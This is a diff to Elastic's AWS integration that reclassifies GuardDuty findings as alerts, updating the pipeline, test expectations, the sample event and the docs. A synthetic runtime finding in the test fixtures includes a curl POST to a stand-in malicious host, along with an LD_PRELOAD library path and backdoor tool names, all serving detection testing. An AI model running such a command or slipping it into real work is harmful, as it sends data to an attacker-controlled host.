diff --git a/packages/aws/changelog.yml b/packages/aws/changelog.yml
index 2955601ae8c..52bcea4532b 100644
--- a/packages/aws/changelog.yml
+++ b/packages/aws/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "6.15.0"
+ changes:
+ - description: Set `event.kind` to `alert` for AWS GuardDuty findings.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/18895
 - version: "6.14.2"
 changes:
 - description: Fix NextToken invalidation in Security Hub, GuardDuty, and Inspector by removing the upper time bound from paginated queries.
diff --git a/packages/aws/data_stream/guardduty/_dev/test/pipeline/test-guardduty.log-expected.json b/packages/aws/data_stream/guardduty/_dev/test/pipeline/test-guardduty.log-expected.json
index f90a256ecf1..728dde92ef6 100644
--- a/packages/aws/data_stream/guardduty/_dev/test/pipeline/test-guardduty.log-expected.json
+++ b/packages/aws/data_stream/guardduty/_dev/test/pipeline/test-guardduty.log-expected.json
@@ -186,7 +186,7 @@ "end": "2022-11-22T12:22:20.000Z", "id": "d6012345678912345678912349f831b8f", "kind": [ - "event" + "alert" ], "original": "{\"schemaVersion\":\"2.0\",\"accountId\":\"123412341234\",\"region\":\"us-east-1\",\"partition\":\"aws\",\"id\":\"d6012345678912345678912349f831b8f\",\"arn\":\"arn:aws:guardduty:us-east-1:123412341234:detector/d60123456789e5461eabcd1234abcd1234/finding/d6012345678912345678912349f831b8f\",\"type\":\"Trojan:EC2/BlackholeTraffic!DNS\",\"resource\":{\"resourceType\":\"Instance\",\"instanceDetails\":{\"instanceId\":\"i-99999999\",\"instanceType\":\"m3.xlarge\",\"outpostArn\":\"arn:aws:outposts:us-west-2:123456789000:outpost/op-abcdefabcdef1234\",\"launchTime\":\"2016-08-02T02:05:06.000Z\",\"platform\":null,\"productCodes\":[{\"productCodeId\":\"GeneratedFindingProductCodeId\",\"productCodeType\":\"GeneratedFindingProductCodeType\"}],\"iamInstanceProfile\":{\"arn\":\"arn:aws:iam::123412341234:example/instance/profile\",\"id\":\"GeneratedFindingInstanceProfileId\"},\"networkInterfaces\":[{\"networkInterfaceId\":\"eni-abcdef888\",\"privateIpAddresses\":[{\"privateDnsName\":\"GeneratedFindingPrivateName\",\"privateIpAddress\":\"175.16.199.1\"}],\"subnetId\":\"GeneratedFindingSubnetId\",\"vpcId\":\"GeneratedFindingVPCId\",\"privateDnsName\":\"GeneratedFindingPrivateDnsName\",\"securityGroups\":[{\"groupName\":\"GeneratedFindingSecurityGroupName\",\"groupId\":\"GeneratedFindingSecurityId\"}],\"publicIp\":\"175.16.199.1\",\"ipv6Addresses\":[],\"publicDnsName\":\"GeneratedFindingPublicDNSName\",\"privateIpAddress\":\"175.16.199.1\"}],\"tags\":[{\"value\":\"GeneratedFindingInstaceValue1\",\"key\":\"GeneratedFindingInstaceTag1\"},{\"value\":\"GeneratedFindingInstaceTagValue2\",\"key\":\"GeneratedFindingInstaceTag2\"},{\"value\":\"GeneratedFindingInstaceTagValue3\",\"key\":\"GeneratedFindingInstaceTag3\"},{\"value\":\"GeneratedFindingInstaceTagValue4\",\"key\":\"GeneratedFindingInstaceTag4\"},{\"value\":\"GeneratedFindingInstaceTagValue5\",
\"key\":\"GeneratedFindingInstaceTag5\"},{\"value\":\"GeneratedFindingInstaceTagValue6\",\"key\":\"GeneratedFindingInstaceTag6\"},{\"value\":\"GeneratedFindingInstaceTagValue7\",\"key\":\"GeneratedFindingInstaceTag7\"},{\"value\":\"GeneratedFindingInstaceTagValue8\",\"key\":\"GeneratedFindingInstaceTag8\"},{\"value\":\"GeneratedFindingInstaceTagValue9\",\"key\":\"GeneratedFindingInstaceTag9\"}],\"instanceState\":\"running\",\"availabilityZone\":\"GeneratedFindingInstaceAvailabilityZone\",\"imageId\":\"ami-99999999\",\"imageDescription\":\"GeneratedFindingInstaceImageDescription\"}},\"service\":{\"serviceName\":\"guardduty\",\"detectorId\":\"d60123456789e5461eabcd1234abcd1234\",\"action\":{\"actionType\":\"DNS_REQUEST\",\"dnsRequestAction\":{\"domain\":\"GeneratedFindingDomainName\",\"protocol\":\"UDP\",\"blocked\":true}},\"resourceRole\":\"TARGET\",\"additionalInfo\":{\"threatListName\":\"GeneratedFindingThreatListName\",\"sample\":true,\"value\":\"{\\\"threatListName\\\":\\\"GeneratedFindingThreatListName\\\",\\\"sample\\\":true}\",\"type\":\"default\"},\"evidence\":{\"threatIntelligenceDetails\":[{\"threatNames\":[\"GeneratedFindingThreatName\"],\"threatListName\":\"GeneratedFindingThreatListName\"}]},\"eventFirstSeen\":\"2022-11-17T09:33:19.000Z\",\"eventLastSeen\":\"2022-11-22T12:22:20.000Z\",\"archived\":false,\"count\":2},\"severity\":5,\"createdAt\":\"2022-11-17T09:33:19.224Z\",\"updatedAt\":\"2022-11-22T12:22:20.934Z\",\"title\":\"Blackholed domain name queried by EC2 instance i-99999999.\",\"description\":\"EC2 instance i-99999999 is querying a domain name of a blackholed domain.\"}", "severity": 5, 
@@ -343,7 +343,7 @@ "end": "2022-11-22T12:22:20.000Z", "id": "250023a9abcdefabcdef12345678", "kind": [ - "event" + "alert" ], "original": "{\"schemaVersion\":\"2.0\",\"accountId\":\"123412341234\",\"region\":\"us-east-1\",\"partition\":\"aws\",\"id\":\"250023a9abcdefabcdef12345678\",\"arn\":\"arn:aws:guardduty:us-east-1:123412341234:detector/abcdefe19ce5461eabcd1234abcd1234/finding/250023a9abcdefabcdef12345678\",\"type\":\"Persistence:Kubernetes/SuccessfulAnonymousAccess\",\"resource\":{\"resourceType\":\"EKSCluster\",\"eksClusterDetails\":{\"name\":\"GeneratedFindingEKSClusterName\",\"arn\":\"GeneratedFindingEKSClusterArn\",\"createdAt\":1636625755.218,\"vpcId\":\"GeneratedFindingEKSClusterVpcId\",\"status\":\"ACTIVE\",\"tags\":[{\"value\":\"GeneratedFindingEKSClusterTagValue1\",\"key\":\"GeneratedFindingEKSClusterTag1\"},{\"value\":\"GeneratedFindingEKSClusterTagValue2\",\"key\":\"GeneratedFindingEKSClusterTag2\"},{\"value\":\"GeneratedFindingEKSClusterTagValue3\",\"key\":\"GeneratedFindingEKSClusterTag3\"}]},\"kubernetesDetails\":{\"kubernetesWorkloadDetails\":null,\"kubernetesUserDetails\":{\"username\":\"system:anonymous\",\"uid\":\"GeneratedFindingUID\",\"groups\":[\"system:unauthenticated\"]}}},\"service\":{\"serviceName\":\"guardduty\",\"detectorId\":\"abcdefe19ce5461eabcd1234abcd1234\",\"action\":{\"actionType\":\"KUBERNETES_API_CALL\",\"kubernetesApiCallAction\":{\"requestUri\":\"GeneratedFindingRequestURI\",\"verb\":\"get\",\"sourceIPs\":[\"175.16.199.1\"],\"userAgent\":\"\",\"remoteIpDetails\":{\"ipAddressV4\":\"175.16.199.1\",\"organization\":{\"asn\":\"0\",\"asnOrg\":\"GeneratedFindingASNOrg\",\"isp\":\"GeneratedFindingISP\",\"org\":\"GeneratedFindingORG\"},\"country\":{\"countryName\":\"GeneratedFindingCountryName\"},\"city\":{\"cityName\":\"GeneratedFindingCityName\"},\"geoLocation\":{\"lat\":0,\"lon\":0}},\"statusCode\":200,\"parameters\":\"GeneratedFindingActionParameters\"}},\"resourceRole\":\"TARGET\",\"additionalInfo\":{\"sample\":true,\"value\"
:\"{\\\"sample\\\":true}\",\"type\":\"default\"},\"evidence\":null,\"eventFirstSeen\":\"2022-11-17T09:33:19.000Z\",\"eventLastSeen\":\"2022-11-22T12:22:20.000Z\",\"archived\":false,\"count\":2},\"severity\":8,\"createdAt\":\"2022-11-17T09:33:19.225Z\",\"updatedAt\":\"2022-11-22T12:22:20.935Z\",\"title\":\"Kubernetes API commonly used in Persistence tactics invoked by the anonymous user.\",\"description\":\"Kubernetes API commonly used in Persistence tactics was invoked on cluster GeneratedFindingEKSClusterName by the anonymous user system:anonymous.\"}", "severity": 8, 
@@ -556,7 +556,7 @@ "end": "2022-11-22T12:22:20.000Z", "id": "43b6abcdeabcdeabcde1234562176924", "kind": [ - "event" + "alert" ], "original": "{\"schemaVersion\":\"2.0\",\"accountId\":\"123412341234\",\"region\":\"us-east-1\",\"partition\":\"aws\",\"id\":\"43b6abcdeabcdeabcde1234562176924\",\"arn\":\"arn:aws:guardduty:us-east-1:123412341234:detector/12341234e19ce5461eabcd1234abcd1234/finding/43b6abcdeabcdeabcde1234562176924\",\"type\":\"Discovery:Kubernetes/TorIPCaller\",\"resource\":{\"resourceType\":\"EKSCluster\",\"eksClusterDetails\":{\"name\":\"GeneratedFindingEKSClusterName\",\"arn\":\"GeneratedFindingEKSClusterArn\",\"createdAt\":1635962410.342,\"vpcId\":\"GeneratedFindingEKSClusterVpcId\",\"status\":\"ACTIVE\",\"tags\":[{\"value\":\"GeneratedFindingEKSClusterTagValue1\",\"key\":\"GeneratedFindingEKSClusterTag1\"},{\"value\":\"GeneratedFindingEKSClusterTagValue2\",\"key\":\"GeneratedFindingEKSClusterTag2\"},{\"value\":\"GeneratedFindingEKSClusterTagValue3\",\"key\":\"GeneratedFindingEKSClusterTag3\"}]},\"kubernetesDetails\":{\"kubernetesWorkloadDetails\":null,\"kubernetesUserDetails\":{\"username\":\"GeneratedFindingUserName\",\"uid\":\"GeneratedFindingUID\",\"groups\":[\"GeneratedFindingUserGroup\"]}},\"accessKeyDetails\":{\"accessKeyId\":\"GeneratedFindingAccessKeyId\",\"principalId\":\"GeneratedFindingPrincipalId\",\"userType\":\"Role\",\"userName\":\"GeneratedFindingUserName\"}},\"service\":{\"serviceName\":\"guardduty\",\"detectorId\":\"12341234e19ce5461eabcd1234abcd1234\",\"action\":{\"actionType\":\"KUBERNETES_API_CALL\",\"kubernetesApiCallAction\":{\"requestUri\":\"GeneratedFindingRequestURI\",\"verb\":\"list\",\"sourceIPs\":[\"175.16.199.1\"],\"userAgent\":\"\",\"remoteIpDetails\":{\"ipAddressV4\":\"175.16.199.1\",\"organization\":{\"asn\":\"0\",\"asnOrg\":\"GeneratedFindingASNOrg\",\"isp\":\"GeneratedFindingISP\",\"org\":\"GeneratedFindingORG\"},\"country\":{\"countryName\":\"GeneratedFindingCountryName\"},\"city\":{\"cityName\":\"GeneratedFindingCi
tyName\"},\"geoLocation\":{\"lat\":0,\"lon\":0}},\"statusCode\":200}},\"resourceRole\":\"TARGET\",\"additionalInfo\":{\"threatName\":\"GeneratedFindingThreatName\",\"threatListName\":\"GeneratedFindingThreatListName\",\"sample\":true,\"value\":\"{\\\"threatName\\\":\\\"GeneratedFindingThreatName\\\",\\\"threatListName\\\":\\\"GeneratedFindingThreatListName\\\",\\\"sample\\\":true}\",\"type\":\"default\"},\"evidence\":{\"threatIntelligenceDetails\":[{\"threatNames\":[\"GeneratedFindingThreatName\"],\"threatListName\":\"GeneratedFindingThreatListName\"}]},\"eventFirstSeen\":\"2022-11-17T09:33:19.000Z\",\"eventLastSeen\":\"2022-11-22T12:22:20.000Z\",\"archived\":false,\"count\":2},\"severity\":5,\"createdAt\":\"2022-11-17T09:33:19.228Z\",\"updatedAt\":\"2022-11-22T12:22:20.938Z\",\"title\":\"Kubernetes API commonly used in Discovery tactics invoked from a Tor exit node IP address.\",\"description\":\"Kubernetes API commonly used in Discovery tactics was invoked on cluster GeneratedFindingEKSClusterName from Tor exit node IP address 175.16.199.1.\"}", "severity": 5, 
@@ -753,7 +753,7 @@ "end": "2022-12-07T10:28:35.000Z", "id": "5abcdefabcdefabcdef2a123456789f6", "kind": [ - "event" + "alert" ], "original": "{\"schemaVersion\":\"2.0\",\"accountId\":\"123412341234\",\"region\":\"us-east-1\",\"partition\":\"aws\",\"id\":\"5abcdefabcdefabcdef2a123456789f6\",\"arn\":\"arn:aws:guardduty:us-east-1:123412341234:detector/4ec22961e1defabcdefabcdef2a1234/finding/5abcdefabcdefabcdef2a123456789f6\",\"type\":\"CredentialAccess:RDS/AnomalousBehavior.SuccessfulLogin\",\"resource\":{\"resourceType\":\"RDSDBInstance\",\"rdsDbInstanceDetails\":{\"dbInstanceIdentifier\":\"GeneratedFindingDBInstanceId\",\"engine\":\"GeneratedFindingEngine\",\"engineVersion\":\"13.6\",\"dbClusterIdentifier\":\"GeneratedFindingDBClusterId\",\"dbInstanceArn\":\"arn:aws:rds:us-east-1:123456789000:db:GeneratedFindingDBInstanceId\"},\"rdsDbUserDetails\":{\"user\":\"GeneratedFindingUserName\",\"application\":\"GeneratedFindingApplicationName\",\"database\":\"GeneratedFindingDatabaseName\",\"ssl\":\"GeneratedSSLValue\",\"authMethod\":\"GeneratedFindingAuthMethod\"}},\"service\":{\"action\":{\"actionType\":\"RDS_LOGIN_ATTEMPT\",\"rdsLoginAttemptAction\":{\"remoteIpDetails\":{\"ipAddressV4\":\"175.16.199.1\",\"organization\":{\"asn\":\"0\",\"asnOrg\":\"GeneratedFindingAsnOrg\",\"isp\":\"GeneratedFindingIsp\",\"org\":\"GeneratedFindingOrg\"},\"country\":{\"countryName\":\"GeneratedFindingCountryName\"},\"city\":{\"cityName\":\"GeneratedFindingCityName\"},\"geoLocation\":{\"lat\":0,\"lon\":0}}}},\"additionalInfo\":{\"unusualBehavior\":{\"unusualUserNameClusterProfiling\":{\"userName\":\"GeneratedFindingUserName\",\"failedLoginCount\":0,\"successfulLoginCount\":1,\"incompleteConnectionCount\":0},\"unusualASNClusterProfiling\":{\"asnOrg\":\"GeneratedFindingAsnOrg\",\"failedLoginCount\":0,\"successfulLoginCount\":10,\"incompleteConnectionCount\":0},\"unusualApplicationNameClusterProfiling\":{\"applicationName\":\"GeneratedFindingApplicationName\",\"failedLoginCount\":0,\"successfu
lLoginCount\":1,\"incompleteConnectionCount\":0},\"unusualDatabaseNameClusterProfiling\":{\"databaseName\":\"GeneratedFindingDatabaseName\",\"failedLoginCount\":0,\"successfulLoginCount\":1,\"incompleteConnectionCount\":0}},\"sample\":true,\"value\":\"{\\\"unusualBehavior\\\":{\\\"unusualUserNameClusterProfiling\\\":{\\\"userName\\\":\\\"GeneratedFindingUserName\\\",\\\"failedLoginCount\\\":0,\\\"successfulLoginCount\\\":1,\\\"incompleteConnectionCount\\\":0},\\\"unusualASNClusterProfiling\\\":{\\\"asnOrg\\\":\\\"GeneratedFindingAsnOrg\\\",\\\"failedLoginCount\\\":0,\\\"successfulLoginCount\\\":10,\\\"incompleteConnectionCount\\\":0},\\\"unusualApplicationNameClusterProfiling\\\":{\\\"applicationName\\\":\\\"GeneratedFindingApplicationName\\\",\\\"failedLoginCount\\\":0,\\\"successfulLoginCount\\\":1,\\\"incompleteConnectionCount\\\":0},\\\"unusualDatabaseNameClusterProfiling\\\":{\\\"databaseName\\\":\\\"GeneratedFindingDatabaseName\\\",\\\"failedLoginCount\\\":0,\\\"successfulLoginCount\\\":1,\\\"incompleteConnectionCount\\\":0}},\\\"sample\\\":true}\",\"type\":\"default\"},\"resourceRole\":\"TARGET\",\"evidence\":null,\"count\":1,\"detectorId\":\"4ec22961e1defabcdefabcdef2a1234\",\"eventFirstSeen\":\"2022-12-07T10:28:35.000Z\",\"eventLastSeen\":\"2022-12-07T10:28:35.000Z\",\"serviceName\":\"guardduty\",\"archived\":false},\"createdAt\":\"2022-12-07T10:28:35.948Z\",\"severity\":8,\"updatedAt\":\"2022-12-07T10:28:35.948Z\",\"title\":\"Unusual successful login by GeneratedFindingUserName observed on RDS instance GeneratedFindingDBInstanceId.\",\"description\":\"Unusual successful login by GeneratedFindingUserName observed on RDS instance GeneratedFindingDBInstanceId.\"}", "severity": 8, 
@@ -1017,7 +1017,7 @@ "end": "2024-10-04T04:06:30.383Z", "id": "abcd1234", "kind": [ - "event" + "alert" ], "original": "{\"schemaVersion\":\"2.0\",\"accountId\":\"123456789\",\"region\":\"us-west-1\",\"partition\":\"aws\",\"id\":\"abcd1234\",\"arn\":\"arn:aws:guardduty:us-west-1:abcd1234:detector/abcd1234/finding/abcd1234\",\"type\":\"PrivilegeEscalation:Runtime/DockerSocketAccessed\",\"resource\":{\"resourceType\":\"Container\",\"instanceDetails\":{\"instanceId\":\"i-abcd1234\",\"instanceType\":\"m2.large\",\"launchTime\":\"2024-07-29T17:58:17.000Z\",\"platform\":null,\"productCodes\":[],\"iamInstanceProfile\":{\"arn\":\"arn:aws:iam::abcd1234:instance-profile/buildserver_profile\",\"id\":\"AAAAAAAAAAAAAAAAAAA\"},\"networkInterfaces\":[{\"ipv6Addresses\":[],\"networkInterfaceId\":\"eni-abcd1234\",\"privateDnsName\":\"[ip-10-30-30-15.us](https://ip-10-30-30-15.us/)-west-1.compute.internal\",\"privateIpAddress\":\"10.30.30.15\",\"privateIpAddresses\":[{\"privateDnsName\":\"[ip-10-30-30-15.us](https://ip-10-30-30-15.us/)-west-1.compute.internal\",\"privateIpAddress\":\"10.30.30.15\"}],\"subnetId\":\"subnet-abcd1234\",\"vpcId\":\"vpc-abcd1234\",\"securityGroups\":[{\"groupName\":\"build\",\"groupId\":\"sg-abcd1234\"},{\"groupName\":\"main\",\"groupId\":\"sg-abcd1234\"}],\"publicDnsName\":\"[ec2-216.160.83.56.us-west-1.compute.amazonaws.com](https://ec2-216.160.83.56.us-west-1.compute.amazonaws.com/)\",\"publicIp\":\"216.160.83.56\"}],\"outpostArn\":null,\"tags\":[{\"key\":\"Name\",\"value\":\"buildserver-a-0\"},{\"key\":\"group\",\"value\":\"build-server\"}],\"instanceState\":\"running\",\"availabilityZone\":\"us-west-1b\",\"imageId\":\"ami-abcd1234\",\"imageDescription\":\"Ubuntu 20.04 AMI with Docker 
installed\"},\"containerDetails\":{\"containerRuntime\":\"docker\",\"id\":\"abcd1234\",\"name\":null,\"image\":\"[abcd1234.us-west-1.amazonaws.com/mirror/test/infrastructure-bundle:2.8.37](https://abcd1234.us-west-1.amazonaws.com/mirror/test/infrastructure-bundle:2.8.37)\",\"imageUid\":null,\"volumeMounts\":null,\"securityContext\":null,\"imagePrefix\":null}},\"service\":{\"serviceName\":\"guardduty\",\"featureName\":\"RuntimeMonitoring\",\"detectorId\":\"abcd1234\",\"action\":{},\"runtimeDetails\":{\"context\":{\"addressFamily\":\"AF_INET\",\"commandLineExample\":\"/usr/bin/curl -X POST http://malicious.example.com\",\"fileSystemType\":\"ext4\",\"flags\":[\"ro\"],\"ianaProtocolNumber\":6,\"ldPreloadValue\":\"/usr/lib/libmalicious.so\",\"libraryPath\":\"/usr/lib/libc.so.6\",\"memoryRegions\":[\"heap\",\"stack\"],\"modifiedAt\":\"2024-10-07T18:45:30Z\",\"modifyingProcess\":{\"name\":\"bash\",\"pid\":2451,\"user\":\"root\"},\"moduleFilePath\":\"/lib/modules/5.15.0-1023-generic/kernel/net/ipv4/netfilter/ipt_MAL.so\",\"moduleName\":\"ipt_MAL\",\"moduleSha256\":\"3f79bb7b435b05321651daef713b4ea0\",\"mountSource\":\"/dev/sda1\",\"mountTarget\":\"/mnt/data\",\"releaseAgentPath\":\"/mnt/container/release_agent\",\"runcBinaryPath\":\"/usr/sbin/runc\",\"scriptPath\":\"/usr/local/bin/malicious_script.sh\",\"serviceName\":\"firewalld\",\"shellHistoryFilePath\":\"/root/.bash_history\",\"socketPath\":\"/var/run/docker.sock\",\"targetProcess\":{\"name\":\"sshd\",\"pid\":3124,\"user\":\"admin\"},\"threatFilePath\":\"/tmp/malicious_file.bin\",\"toolCategory\":\"Backdoor Tool\",\"toolName\":\"SSH 
Backdoor\"},\"process\":{\"euid\":1000,\"executablePath\":\"/usr/bin/ssh\",\"executableSha256\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"lineage\":[{\"parentUuid\":\"f7c2b111-4355-45f2-8462-3e418af0a1cc\",\"ancestorPid\":123,\"ancestorName\":\"sshd\"},{\"parentUuid\":\"a23f2d33-9b4e-4e18-b18e-5b4b25efce88\",\"ancestorPid\":456,\"ancestorName\":\"apache2\"}],\"name\":\"sshd\",\"namespacePid\":456,\"parentUuid\":\"f7c2b111-4355-45f2-8462-3e418af0a1cc\",\"pid\":2345,\"pwd\":\"/home/user\",\"startTime\":1728014790.3773646,\"user\":\"admin\",\"userId\":1000,\"uuid\":\"abc12345-def6-7890-ghij-klmnopqrstuv\"}},\"additionalInfo\":{\"value\":\"{}\",\"type\":\"default\"},\"eventFirstSeen\":\"2024-07-24T04:03:51.666Z\",\"eventLastSeen\":\"2024-10-04T04:06:30.383Z\",\"archived\":false,\"count\":9},\"severity\":5,\"createdAt\":\"2024-07-24T04:06:10.359Z\",\"updatedAt\":\"2024-10-04T04:09:13.066Z\",\"title\":\"A container is communicating with a docker socket.\",\"description\":\"A process is communicating with a docker socket using a unix socket.\"}", "severity": 5, diff --git a/packages/aws/data_stream/guardduty/elasticsearch/ingest_pipeline/default.yml b/packages/aws/data_stream/guardduty/elasticsearch/ingest_pipeline/default.yml index 4f5a5de3ee0..c8b56b04819 100644 --- a/packages/aws/data_stream/guardduty/elasticsearch/ingest_pipeline/default.yml +++ b/packages/aws/data_stream/guardduty/elasticsearch/ingest_pipeline/default.yml @@ -17,7 +17,7 @@ processors: as they can collide with ECS fields. - set: field: event.kind - value: [event] + value: [alert] - set: field: event.type value: [info] diff --git a/packages/aws/data_stream/guardduty/sample_event.json b/packages/aws/data_stream/guardduty/sample_event.json index 75f12073d69..26a52491eab 100644 --- a/packages/aws/data_stream/guardduty/sample_event.json +++ b/packages/aws/data_stream/guardduty/sample_event.json 
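Review bot: The new `value: [alert]` under `field: event.kind` in the ingest pipeline hunk carries no comment explaining the choice, and the adjacent `event.type` set processor still emits a static `[info]` that the change does not revisit; ECS reserves `alert` for detections produced by a system outside Elastic Security, so a one-line why-comment such as `# GuardDuty findings are detections from an external system, so ECS classifies them as alerts rather than plain events.` above `value: [alert]` would help the next maintainer. Any downstream saved search, dashboard or rule that filters this data stream on `event.kind: event` will stop matching after this version, and the changelog entry classifies the change as an enhancement, so a short note in the package docs calling out the filter change would help operators. Whether `event.type: [info]` remains an appropriate static value once the documents are alerts cannot be judged from the hunk alone, since the processors list continues outside it.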
@@ -159,7 +159,7 @@ "id": "e0c22973b012f3af67ac593443e920ff", "ingested": "2025-11-12T05:48:59Z", "kind": [ - "event" + "alert" ], "original": "{\"accountId\":\"123412341234\",\"arn\":\"arn:aws:guardduty:us-east-1:123412341234:detector/12341234e19ce5461eabcd1234abcd1234/finding/43b6abcdeabcdeabcde1234562176924\",\"createdAt\":\"2022-11-17T09:33:19.228Z\",\"description\":\"Kubernetes API commonly used in Discovery tactics was invoked on cluster GeneratedFindingEKSClusterName from Tor exit node IP address 175.16.199.1.\",\"id\":\"e0c22973b012f3af67ac593443e920ff\",\"partition\":\"aws\",\"region\":\"us-east-1\",\"resource\":{\"accessKeyDetails\":{\"accessKeyId\":\"GeneratedFindingAccessKeyId\",\"principalId\":\"GeneratedFindingPrincipalId\",\"userName\":\"GeneratedFindingUserName\",\"userType\":\"Role\"},\"eksClusterDetails\":{\"arn\":\"GeneratedFindingEKSClusterArn\",\"createdAt\":1635962410.342,\"name\":\"GeneratedFindingEKSClusterName\",\"status\":\"ACTIVE\",\"tags\":[{\"key\":\"GeneratedFindingEKSClusterTag1\",\"value\":\"GeneratedFindingEKSClusterTagValue1\"},{\"key\":\"GeneratedFindingEKSClusterTag2\",\"value\":\"GeneratedFindingEKSClusterTagValue2\"},{\"key\":\"GeneratedFindingEKSClusterTag3\",\"value\":\"GeneratedFindingEKSClusterTagValue3\"}],\"vpcId\":\"GeneratedFindingEKSClusterVpcId\"},\"kubernetesDetails\":{\"kubernetesUserDetails\":{\"groups\":[\"GeneratedFindingUserGroup\"],\"uid\":\"GeneratedFindingUID\",\"username\":\"GeneratedFindingUserName\"},\"kubernetesWorkloadDetails\":null},\"resourceType\":\"EKSCluster\"},\"schemaVersion\":\"2.0\",\"service\":{\"action\":{\"actionType\":\"KUBERNETES_API_CALL\",\"kubernetesApiCallAction\":{\"remoteIpDetails\":{\"city\":{\"cityName\":\"GeneratedFindingCityName\"},\"country\":{\"countryName\":\"GeneratedFindingCountryName\"},\"geoLocation\":{\"lat\":0,\"lon\":0},\"ipAddressV4\":\"175.16.199.1\",\"organization\":{\"asn\":\"0\",\"asnOrg\":\"GeneratedFindingASNOrg\",\"isp\":\"GeneratedFindingISP\",\"org\":\"Generated
FindingORG\"}},\"requestUri\":\"GeneratedFindingRequestURI\",\"sourceIPs\":[\"175.16.199.1\"],\"statusCode\":200,\"userAgent\":\"\",\"verb\":\"list\"}},\"additionalInfo\":{\"sample\":true,\"threatListName\":\"GeneratedFindingThreatListName\",\"threatName\":\"GeneratedFindingThreatName\",\"type\":\"default\",\"value\":\"{\\\"threatName\\\":\\\"GeneratedFindingThreatName\\\",\\\"threatListName\\\":\\\"GeneratedFindingThreatListName\\\",\\\"sample\\\":true}\"},\"archived\":false,\"count\":2,\"detectorId\":\"12341234e19ce5461eabcd1234abcd1234\",\"eventFirstSeen\":\"2022-11-17T09:33:19.000Z\",\"eventLastSeen\":\"2022-11-22T12:22:20.000Z\",\"evidence\":{\"threatIntelligenceDetails\":[{\"threatListName\":\"GeneratedFindingThreatListName\",\"threatNames\":[\"GeneratedFindingThreatName\"]}]},\"resourceRole\":\"TARGET\",\"serviceName\":\"guardduty\"},\"severity\":5,\"title\":\"Kubernetes API commonly used in Discovery tactics invoked from a Tor exit node IP address.\",\"type\":\"Discovery:Kubernetes/TorIPCaller\",\"updatedAt\":\"2022-11-22T12:22:20.938Z\"}", "severity": 5, diff --git a/packages/aws/docs/guardduty.md b/packages/aws/docs/guardduty.md index fd0613bd14a..eb1d7ba6669 100644 --- a/packages/aws/docs/guardduty.md +++ b/packages/aws/docs/guardduty.md 
@@ -253,7 +253,7 @@ An example event for `guardduty` looks as following: "id": "e0c22973b012f3af67ac593443e920ff", "ingested": "2025-11-12T05:48:59Z", "kind": [ - "event" + "alert" ], "original": "{\"accountId\":\"123412341234\",\"arn\":\"arn:aws:guardduty:us-east-1:123412341234:detector/12341234e19ce5461eabcd1234abcd1234/finding/43b6abcdeabcdeabcde1234562176924\",\"createdAt\":\"2022-11-17T09:33:19.228Z\",\"description\":\"Kubernetes API commonly used in Discovery tactics was invoked on cluster GeneratedFindingEKSClusterName from Tor exit node IP address 175.16.199.1.\",\"id\":\"e0c22973b012f3af67ac593443e920ff\",\"partition\":\"aws\",\"region\":\"us-east-1\",\"resource\":{\"accessKeyDetails\":{\"accessKeyId\":\"GeneratedFindingAccessKeyId\",\"principalId\":\"GeneratedFindingPrincipalId\",\"userName\":\"GeneratedFindingUserName\",\"userType\":\"Role\"},\"eksClusterDetails\":{\"arn\":\"GeneratedFindingEKSClusterArn\",\"createdAt\":1635962410.342,\"name\":\"GeneratedFindingEKSClusterName\",\"status\":\"ACTIVE\",\"tags\":[{\"key\":\"GeneratedFindingEKSClusterTag1\",\"value\":\"GeneratedFindingEKSClusterTagValue1\"},{\"key\":\"GeneratedFindingEKSClusterTag2\",\"value\":\"GeneratedFindingEKSClusterTagValue2\"},{\"key\":\"GeneratedFindingEKSClusterTag3\",\"value\":\"GeneratedFindingEKSClusterTagValue3\"}],\"vpcId\":\"GeneratedFindingEKSClusterVpcId\"},\"kubernetesDetails\":{\"kubernetesUserDetails\":{\"groups\":[\"GeneratedFindingUserGroup\"],\"uid\":\"GeneratedFindingUID\",\"username\":\"GeneratedFindingUserName\"},\"kubernetesWorkloadDetails\":null},\"resourceType\":\"EKSCluster\"},\"schemaVersion\":\"2.0\",\"service\":{\"action\":{\"actionType\":\"KUBERNETES_API_CALL\",\"kubernetesApiCallAction\":{\"remoteIpDetails\":{\"city\":{\"cityName\":\"GeneratedFindingCityName\"},\"country\":{\"countryName\":\"GeneratedFindingCountryName\"},\"geoLocation\":{\"lat\":0,\"lon\":0},\"ipAddressV4\":\"175.16.199.1\",\"organization\":{\"asn\":\"0\",\"asnOrg\":\"GeneratedFindingASNOrg\
",\"isp\":\"GeneratedFindingISP\",\"org\":\"GeneratedFindingORG\"}},\"requestUri\":\"GeneratedFindingRequestURI\",\"sourceIPs\":[\"175.16.199.1\"],\"statusCode\":200,\"userAgent\":\"\",\"verb\":\"list\"}},\"additionalInfo\":{\"sample\":true,\"threatListName\":\"GeneratedFindingThreatListName\",\"threatName\":\"GeneratedFindingThreatName\",\"type\":\"default\",\"value\":\"{\\\"threatName\\\":\\\"GeneratedFindingThreatName\\\",\\\"threatListName\\\":\\\"GeneratedFindingThreatListName\\\",\\\"sample\\\":true}\"},\"archived\":false,\"count\":2,\"detectorId\":\"12341234e19ce5461eabcd1234abcd1234\",\"eventFirstSeen\":\"2022-11-17T09:33:19.000Z\",\"eventLastSeen\":\"2022-11-22T12:22:20.000Z\",\"evidence\":{\"threatIntelligenceDetails\":[{\"threatListName\":\"GeneratedFindingThreatListName\",\"threatNames\":[\"GeneratedFindingThreatName\"]}]},\"resourceRole\":\"TARGET\",\"serviceName\":\"guardduty\"},\"severity\":5,\"title\":\"Kubernetes API commonly used in Discovery tactics invoked from a Tor exit node IP address.\",\"type\":\"Discovery:Kubernetes/TorIPCaller\",\"updatedAt\":\"2022-11-22T12:22:20.938Z\"}", "severity": 5, diff --git a/packages/aws/manifest.yml b/packages/aws/manifest.yml index bf789bf24ec..c0665493806 100644 --- a/packages/aws/manifest.yml +++ b/packages/aws/manifest.yml @@ -1,7 +1,7 @@ format_version: 3.4.0 name: aws title: AWS -version: 6.14.2 +version: 6.15.0 description: Collect logs and metrics from Amazon Web Services (AWS) with Elastic Agent. type: integration categories: